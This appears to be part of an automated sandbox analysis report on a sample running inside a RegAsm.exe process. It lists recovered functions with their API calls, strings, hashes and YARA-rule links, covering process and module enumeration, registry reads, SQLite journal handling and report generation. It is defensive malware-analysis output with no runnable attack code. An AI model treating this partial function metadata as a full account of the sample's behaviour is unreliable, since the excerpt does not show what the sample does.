                                                                                Similarity
                                                                                • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                • String ID: ($d
                                                                                • API String ID: 1140211610-1915259565
                                                                                • Opcode ID: 0069feb4b1de97920c5300279c07769cea3f871f2420f4ec65c64da01ae34e30
                                                                                • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                • Opcode Fuzzy Hash: 0069feb4b1de97920c5300279c07769cea3f871f2420f4ec65c64da01ae34e30
                                                                                • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                • GetLastError.KERNEL32 ref: 004178FB
                                                                                • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: File$ErrorLastLockSleepUnlock
                                                                                • String ID:
                                                                                • API String ID: 3015003838-0
                                                                                • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                • memset.MSVCRT ref: 00413ADC
                                                                                • memset.MSVCRT ref: 00413AEC
                                                                                  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                • memset.MSVCRT ref: 00413BD7
                                                                                • wcscpy.MSVCRT ref: 00413BF8
                                                                                • CloseHandle.KERNEL32(?), ref: 00413C4E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                • String ID: 3A
                                                                                • API String ID: 3300951397-293699754
                                                                                • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                • wcscpy.MSVCRT ref: 0040D1B5
                                                                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                • wcslen.MSVCRT ref: 0040D1D3
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                • memcpy.MSVCRT ref: 0040D24C
                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                • String ID: strings
                                                                                • API String ID: 3166385802-3030018805
                                                                                • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00411AF6
                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                • wcsrchr.MSVCRT ref: 00411B14
                                                                                • wcscat.MSVCRT ref: 00411B2E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                • String ID: AE$.cfg$General$EA
                                                                                • API String ID: 776488737-1622828088
                                                                                • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040D8BD
                                                                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                • memset.MSVCRT ref: 0040D906
                                                                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                • String ID: sysdatetimepick32
                                                                                • API String ID: 1028950076-4169760276
                                                                                • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                Function 004044A4 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 52librarywindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Library$FreeLoadMessage
                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                • API String ID: 3897320386-317687271
                                                                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                Function 004138C1 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                • API String ID: 4271163124-70141382
                                                                                • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                Function 0041383D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                • API String ID: 4139908857-3953557276
                                                                                • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset
                                                                                • String ID: -journal$-wal
                                                                                • API String ID: 438689982-2894717839
                                                                                • Opcode ID: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                                                                                • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                • Opcode Fuzzy Hash: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                                                                                • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                • String ID:
                                                                                • API String ID: 4218492932-0
                                                                                • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                                • memcpy.MSVCRT ref: 0044A8BF
                                                                                • memcpy.MSVCRT ref: 0044A90C
                                                                                • memcpy.MSVCRT ref: 0044A988
                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                                • memcpy.MSVCRT ref: 0044A9D8
                                                                                • memcpy.MSVCRT ref: 0044AA19
                                                                                • memcpy.MSVCRT ref: 0044AA4A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset
                                                                                • String ID: gj
                                                                                • API String ID: 438689982-4203073231
                                                                                • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                • memset.MSVCRT ref: 00405ABB
                                                                                • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                • SetFocus.USER32(?), ref: 00405B76
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                • String ID:
                                                                                • API String ID: 4281309102-0
                                                                                • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintfwcscat
                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                • API String ID: 384018552-4153097237
                                                                                • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                • String ID: 0$6
                                                                                • API String ID: 2029023288-3849865405
                                                                                • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                • memset.MSVCRT ref: 00405455
                                                                                • memset.MSVCRT ref: 0040546C
                                                                                • memset.MSVCRT ref: 00405483
                                                                                • memcpy.MSVCRT ref: 00405498
                                                                                • memcpy.MSVCRT ref: 004054AD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$memcpy$ErrorLast
                                                                                • String ID: 6$\
                                                                                • API String ID: 404372293-1284684873
                                                                                • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                Function 0041851E Relevance: 10.6, APIs: 7, Instructions: 67sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                • GetLastError.KERNEL32 ref: 0041855C
                                                                                • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                • GetLastError.KERNEL32 ref: 0041858E
                                                                                • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesErrorFileLastSleep$??3@
                                                                                • String ID:
                                                                                • API String ID: 1040972850-0
                                                                                • Opcode ID: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                                                                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                • Opcode Fuzzy Hash: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                                                                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                                                • wcscat.MSVCRT ref: 0040A0E6
                                                                                • wcscat.MSVCRT ref: 0040A0F5
                                                                                • wcscpy.MSVCRT ref: 0040A107
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                • String ID:
                                                                                • API String ID: 1331804452-0
                                                                                • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                • <%s>, xrefs: 004100A6
                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_snwprintf
                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                • API String ID: 3473751417-2880344631
                                                                                • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                • String ID: %2.2X
                                                                                • API String ID: 2521778956-791839006
                                                                                • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintfwcscpy
                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                • API String ID: 999028693-502967061
                                                                                • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                  • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                                • memset.MSVCRT ref: 0040C439
                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                • _wcsupr.MSVCRT ref: 0040C481
                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
